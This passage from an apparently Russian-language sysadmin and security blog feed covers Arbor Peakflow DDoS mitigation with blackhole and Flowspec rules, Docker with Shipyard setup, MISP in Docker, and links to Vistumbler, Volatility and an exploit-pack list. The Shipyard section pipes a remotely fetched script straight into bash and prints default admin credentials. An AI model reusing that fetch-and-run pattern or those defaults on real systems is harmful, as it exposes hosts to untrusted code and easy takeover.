<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1NsL9srpqtd26GMl59vYKOmui-ZRI0BujsZndMex8quVtX4gm-VQ6kBFxxbazytnh-NkURBraf7CQ3ZyDs1HtXqhLK2MRL6E3Z1KKuCeCyMgU2J1p1QO7V3qYWktZd3VmEEyE_eEbczE/s1600/22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="286" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1NsL9srpqtd26GMl59vYKOmui-ZRI0BujsZndMex8quVtX4gm-VQ6kBFxxbazytnh-NkURBraf7CQ3ZyDs1HtXqhLK2MRL6E3Z1KKuCeCyMgU2J1p1QO7V3qYWktZd3VmEEyE_eEbczE/s640/22.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
как видно, появился алерт. Далее можно перейти в более детализированный режим, нажав на его id. (57098).</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq8yNPInKa6holwvycMNbujqjx1-GcsKjPSJyYjQMIZC4h5NixPAr2WPYCC_8HYQjiafOd0-vdG3CE51vNnuBGoW0mpHrgTrDC562wO0yGZ4DVglHC4aGoaL60K7LBRUxw2oUo2EI9mGc/s1600/23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq8yNPInKa6holwvycMNbujqjx1-GcsKjPSJyYjQMIZC4h5NixPAr2WPYCC_8HYQjiafOd0-vdG3CE51vNnuBGoW0mpHrgTrDC562wO0yGZ4DVglHC4aGoaL60K7LBRUxw2oUo2EI9mGc/s640/23.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
Смотрим богатейшую статистку и анализ атаки:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLQ0addI8nQWlEuwnxOdH7uLf0TUMAO_QcvOouTjrLvZb2Ephc9pVQ9kwWaHm8bKg9kCgGUDFjPEmdY3pce45-i7bG0RhlEV9BOldbXmJgo1Jjt2UqMUXxoIHQLy4RDy3wUhGIACutZ58/s1600/24.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="552" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLQ0addI8nQWlEuwnxOdH7uLf0TUMAO_QcvOouTjrLvZb2Ephc9pVQ9kwWaHm8bKg9kCgGUDFjPEmdY3pce45-i7bG0RhlEV9BOldbXmJgo1Jjt2UqMUXxoIHQLy4RDy3wUhGIACutZ58/s640/24.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE6E97tGcLzSJmCo7H2wAVK4oopHGx_pqG0JaHtstyrQ8dxD2IYzJXNJORMSVdWBsByHPyks5zloElCBSRV3wWuTHe5q6Jkdr8bRVAcui9shoO1IpmCnooddp_dZkJ0yeo3QNpkG4oxRk/s1600/25.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="566" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE6E97tGcLzSJmCo7H2wAVK4oopHGx_pqG0JaHtstyrQ8dxD2IYzJXNJORMSVdWBsByHPyks5zloElCBSRV3wWuTHe5q6Jkdr8bRVAcui9shoO1IpmCnooddp_dZkJ0yeo3QNpkG4oxRk/s640/25.png" width="640" /></a></div>
<br />
Далее о подавлении атаки, есть 2 варианта, 1й - блекхол, 2й - более интеллектуальный Flowspec.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAmdXWVvGCDPgBy0OHdEghTFLfzvLAk7CjRPalwq9hL-VwtpzyCwsqMDne3IuTEtf0Kx8soD9mWN9SdIynkjWIfifMclG01KCawYRJsnemMCY7ZKC9lKZi661RtRI-2OFUoIEgMQDykag/s1600/27.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAmdXWVvGCDPgBy0OHdEghTFLfzvLAk7CjRPalwq9hL-VwtpzyCwsqMDne3IuTEtf0Kx8soD9mWN9SdIynkjWIfifMclG01KCawYRJsnemMCY7ZKC9lKZi661RtRI-2OFUoIEgMQDykag/s640/27.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
По поводу Blackhole, ничего сложного, просто пишем ip клиента, выбераем роутер для анонса, и отключаем клиента:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZChWAUR9FbsRnG0i8-8zFBmYSM410DuVIBRS3i7gW_icptfXSQAHmRaAWRsjP77EKdpNlo00qJlxqeiMoPPK_EwZzkvhMQYHz4GaUcjLeOLU99p2nEJotOcCZ8n9_vgf3ifHL5_9unTc/s1600/26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="490" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZChWAUR9FbsRnG0i8-8zFBmYSM410DuVIBRS3i7gW_icptfXSQAHmRaAWRsjP77EKdpNlo00qJlxqeiMoPPK_EwZzkvhMQYHz4GaUcjLeOLU99p2nEJotOcCZ8n9_vgf3ifHL5_9unTc/s640/26.png" width="640" /></a></div>
<div>
Втотой метод интересней, так как позволяет оставить клиента в сети, а атаку срезать по определенным ip, или определенном "шаблоне" трафика, что дает возможность заблокировать атакующих по их поведению, а не тупо по ip.</div>
<div>
Для этого, нужно в меню, выбрать Flow Specification, и далее опираясь на данные о атаке (это все можно посмотреть в детализированном режиме по алерту) заполняем необходимые поля:</div>
<div>
<br /></div>
<div>
Выбор роутера для анонса:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpbwwj_XJIm8U5q2YDvVlCwFFVtHCJBDyRRuqSkTIHuZLrX8GCm_bPo5Qbdvcoz0JAbfyifZhREf7N4CBl21oBFyY20xQbRCE48GU_1zMo26pHdjqAQKuNeJuQHX6zCBWGrVIOMzaRudM/s1600/28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="304" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpbwwj_XJIm8U5q2YDvVlCwFFVtHCJBDyRRuqSkTIHuZLrX8GCm_bPo5Qbdvcoz0JAbfyifZhREf7N4CBl21oBFyY20xQbRCE48GU_1zMo26pHdjqAQKuNeJuQHX6zCBWGrVIOMzaRudM/s640/28.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Далее указываем параметры для блокировки(для теста я сделал просто src и dst), но опираясь на информацию из алерта, можно заполнить "характер атаки" :</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXbiYR9JEdX2SHzcoliElYmXU3rGLwzNQW8z3HforlRRUAAooSRjUYsU_ZD5OmEdoOvz-0hmH6K_eesGPgkydoZsDsiotJjAIxLXpAOBhpOz8FJnsaX5I4rop9oVkrMPTQEvh0yvNcF3g/s1600/29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="438" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXbiYR9JEdX2SHzcoliElYmXU3rGLwzNQW8z3HforlRRUAAooSRjUYsU_ZD5OmEdoOvz-0hmH6K_eesGPgkydoZsDsiotJjAIxLXpAOBhpOz8FJnsaX5I4rop9oVkrMPTQEvh0yvNcF3g/s640/29.png" width="640" /></a></div>
Ну и конечно, действие над трафиком, которое попадает под шаблон, составленный выше:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0OPceZe6s0-2h0WNvsA_g7LbAq8t0zGnwCF_T4SAovmQqZKcjODo1XlPh2hfnnr4y4PD_JuNer1DuhyKryiuhpsxjBPiwgoTGh-G8m3Os8DF8XVyvpV2H-ChBsmf0dIzPwXL_utDP3c4/s1600/30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0OPceZe6s0-2h0WNvsA_g7LbAq8t0zGnwCF_T4SAovmQqZKcjODo1XlPh2hfnnr4y4PD_JuNer1DuhyKryiuhpsxjBPiwgoTGh-G8m3Os8DF8XVyvpV2H-ChBsmf0dIzPwXL_utDP3c4/s640/30.png" width="640" /></a></div>
<br />
<br />
После чего, мы можем активировать наше правило, в соответствующем меню, или деактивировать, когда атака ушла:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg66LnccWh5ydu1MJkwLijCkOtHVkuEhiDyt_mH-cS8akXeQxa3evr8yU4wwZ0LhoBRwbMW6G_5GOnEA5Q3VI-9H2SPreHmv1FVcUi43PUNfcPA_IlIc2iN9AawUifoKdFhSvz0sNcsc7w/s1600/31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg66LnccWh5ydu1MJkwLijCkOtHVkuEhiDyt_mH-cS8akXeQxa3evr8yU4wwZ0LhoBRwbMW6G_5GOnEA5Q3VI-9H2SPreHmv1FVcUi43PUNfcPA_IlIc2iN9AawUifoKdFhSvz0sNcsc7w/s640/31.png" width="640" /></a></div>
<div>
<br /></div>
<div>
После включение правила, мы отсекли 98% трафика от всей атаки.</div>
<div>
<br /></div>
<div>
Далее хотел бы протестировать блокировку по "характеру атаки", что скорее будет в следующей части. Все что было рассмотрено выше, это все поверхностные настройки, так сказать, что бы все завелось, и увидеть что из этого можно получить. У Arbor Peakflow колоссальное количество настроек, всех их охватить не возможно :) для этого есть очень хороший ман, в самой системе, а так же куча pdfок. Это все обзорный материал, написанный с целью понимания системы, и просто что бы не забыть :) </div>
</div>
</div>
</div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-1142761303143577607.post-39556079170964505052016-03-12T09:42:00.001+02:002016-03-12T09:42:19.499+02:00Exploit Pack Table List<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzyVgSOd7AYMJ_WGLXOLTuwC30uxtrWNk0BNGGzvvgJ58tcCsmIp9uVKlnu7NomjJtd0v1W3HpHjINFq-R8SoNI3wV6YE8HMW8sR97D45Fspd9KGo8BNE_kfwYXboGfXph92prG6GvubU/s1600/123.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="324" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzyVgSOd7AYMJ_WGLXOLTuwC30uxtrWNk0BNGGzvvgJ58tcCsmIp9uVKlnu7NomjJtd0v1W3HpHjINFq-R8SoNI3wV6YE8HMW8sR97D45Fspd9KGo8BNE_kfwYXboGfXph92prG6GvubU/s640/123.png" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<a href="https://docs.google.com/spreadsheets/d/1cK7vFVn73NTsoLU487nh-XVSFu7M064RgHeDZB0a2s8/edit?pref=2&pli=1#gid=0">https://docs.google.com/spreadsheets/d/1cK7vFVn73NTsoLU487nh-XVSFu7M064RgHeDZB0a2s8/edit?pref=2&pli=1#gid=0</a></div>
</div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-1142761303143577607.post-59786208527912496192016-03-10T15:00:00.000+02:002016-03-10T15:05:07.488+02:00Docker + shipyard [Web iface + Clustering] on Ubuntu 15.10<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Установка Docker на Ubuntu 15.10 с надстройкой Shipyard (управление и деплой контейнеров через удобный web интерфейс + подключение других нод (кластеризация) ), построенной на <a href="https://docs.docker.com/swarm">Docker Swarm</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSOU9__rQhSiqwoj3HgSHl1vKdBoIVcBER2bkORiRrAJYhfHtD6D0_9hs8Y7YQlLXV1LE5hHekKy_nuwHSnwrZqwCUB_TwJ9IMINsKNnl02a6LePYrRZCaatps7D6pOY6bwThDI3AZdio/s1600/Clip2net_160310145157.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSOU9__rQhSiqwoj3HgSHl1vKdBoIVcBER2bkORiRrAJYhfHtD6D0_9hs8Y7YQlLXV1LE5hHekKy_nuwHSnwrZqwCUB_TwJ9IMINsKNnl02a6LePYrRZCaatps7D6pOY6bwThDI3AZdio/s640/Clip2net_160310145157.png" width="640" /></a></div>
<br />
Установка докера:<br />
<br />
# apt-get update && apt-get dist-upgrade -y<br />
# apt-get install apt-transport-https ca-certificates<br />
<br />
# apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D<br />
<br />
# nano /etc/apt/sources.list.d/docker.list<br />
deb https://apt.dockerproject.org/repo ubuntu-wily main<br />
<div>
<br /></div>
<div>
# apt-get update</div>
<div>
# apt-get purge lxc-docker</div>
<div>
# apt-cache policy docker-engine</div>
<div>
# apt-get install linux-image-extra-$(uname -r)</div>
<div>
# apt-get install docker-engine</div>
<div>
# service docker start</div>
<div>
# docker run hello-world</div>
<div>
<div style="text-align: right;">
<img height="200" src="https://goto.docker.com/rs/929-FJL-178/images/swarmnado.gif" width="160" /></div>
</div>
<div>
Установка Shipyard :</div>
<div>
<br /></div>
<div>
# curl -sSL https://shipyard-project.com/deploy | bash -s</div>
<div>
<br /></div>
<div>
<div>
Shipyard available at http://192.168.1.9:8080</div>
<div>
Username: admin </div>
<div>
Password: shipyard</div>
</div>
<div>
<br /></div>
<div>
Ссылки:</div>
<div>
<a href="https://github.com/shipyard/shipyard">https://github.com/shipyard/shipyard</a></div>
<div>
<a href="http://shipyard-project.com/">http://shipyard-project.com/</a></div>
<div>
<br /></div>
<div>
<a href="https://docs.docker.com/engine/installation/linux/ubuntulinux/">https://docs.docker.com/engine/installation/linux/ubuntulinux/</a></div>
<div>
<br /></div>
<div>
<br /></div>
<br /></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-1142761303143577607.post-1328706275795069852016-03-09T12:48:00.002+02:002016-03-09T12:48:55.400+02:00WIFI scanner [Vistumbler] windows<div dir="ltr" style="text-align: left;" trbidi="on">
A wireless network scanner written in AutoIT for Vista, Windows 7, Windows 8, and Windows 10. VistumblerMDB is the current version of Vistumbler. <a href="http://www.vistumbler.net/">http://www.vistumbler.net</a><div>
<div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<img height="467" src="http://mysticache.techidiots.net/images/mysticache_screenshot.png" width="640" /></div>
<div>
<br /></div>
<div>
<div style="text-align: center;">
<a href="https://www.youtube.com/watch?v=sHEds4L8U_s">https://www.youtube.com/watch?v=sHEds4L8U_s</a></div>
<div style="text-align: center;">
<a href="https://github.com/RIEI/Vistumbler">https://github.com/RIEI/Vistumbler</a></div>
<div style="text-align: center;">
<br /></div>
</div>
</div>
</div>
</div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-1142761303143577607.post-71174782160408653612016-03-09T12:19:00.000+02:002016-03-09T12:20:19.371+02:00Volatility Memory Forensics Framework + WEB<div dir="ltr" style="text-align: left;" trbidi="on">
Volatility Framework является полностью открытым набором инструментов, реализованных на Python под лицензией GNU General Public License, для извлечения цифровых артефактов из энергозависимой памяти (RAM).<br />
<br />
<div style="text-align: center;">
<img src="https://github.com/JamesHabben/evolve/raw/master/images/evolve-logo.png" /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<a href="http://www.volatilityfoundation.org/#!25/c1f29">http://www.volatilityfoundation.org/#!25/c1f29</a></div>
<div style="text-align: center;">
<a href="https://github.com/JamesHabben/evolve/">https://github.com/JamesHabben/evolve/</a></div>
<div style="text-align: center;">
<a href="https://github.com/volatilityfoundation/volatility">https://github.com/volatilityfoundation/volatility</a></div>
<br />
<br /></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-1142761303143577607.post-27872582324880137842016-03-04T10:22:00.000+02:002016-03-23T22:12:42.097+02:00Malware Information Sharing Platform (MISP) on Doker<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
<img src="https://blog.rootshell.be/wp-content/uploads/2016/03/misp-logo.png" /><br />
Original -<a href="https://blog.rootshell.be/2016/03/03/running-misp-in-a-docker-container/"> https://blog.rootshell.be/2016/03/03/running-misp-in-a-docker-container/</a></div>
<a href="https://github.com/MISP/MISP">MISP</a> (“Malware Information Sharing Platform“) is a free software which was initially created by the Belgian Defence to exchange IOC’s with partners like the NCIRC (NATO). Today it became an independent project and is mainly developed by a <a href="http://www.misp-project.org/">group</a> of motivated people. MISP is mainly used by CERT’s (“Computer Emergency Response Team”) but also private companies to exchange thousands on IOC’s on a daily basis.<br />
<div>
<br /></div>
To build the Docker image:<br />
<div>
<pre style="background: rgb(248, 248, 248); border-radius: 2px; border: 1px solid rgb(238, 238, 238); color: grey; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 21px; margin-bottom: 20px; overflow: auto; padding: 15px 30px; vertical-align: baseline;"># git clone https://github.com/xme/misp-docker
# cd misp-docker
# docker build -t misp/misp --build-arg MYSQL_ROOT_PASSWORD=<mysql_root_pw> .
# cat <<__END__ >env.txt
MYSQL_ROOT_PASSWORD=my_strong_root_pw
MYSQL_MISP_PASSWORD=my_strong_misp_pw
__END__
# docker run -d -p 443:443 --env-file=env.txt --restart=always --name misp misp/misp</pre>
Once the container booted, there are still some manual operations to perform. Feel free to fine-tune it to your needs if you already know the tool.<br />
Change the ‘baseurl‘ parameter in /var/www/MISP/app/Config/config.php<br />
Reconfigure Postfix to match your SMTP environment<br />
<br />
To use MISP, point your browser to https://your-docker-server:443.<br />
<br />
<div style="text-align: center;">
The files are available on my <a href="https://github.com/xme/misp-docker">github.com</a> repository.</div>
</div>
</div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-1142761303143577607.post-83661507551248993332016-03-03T11:18:00.003+02:002016-12-26T01:20:18.097+02:00...<div dir="ltr" style="text-align: left;" trbidi="on">
...</div>
Unknownnoreply@blogger.com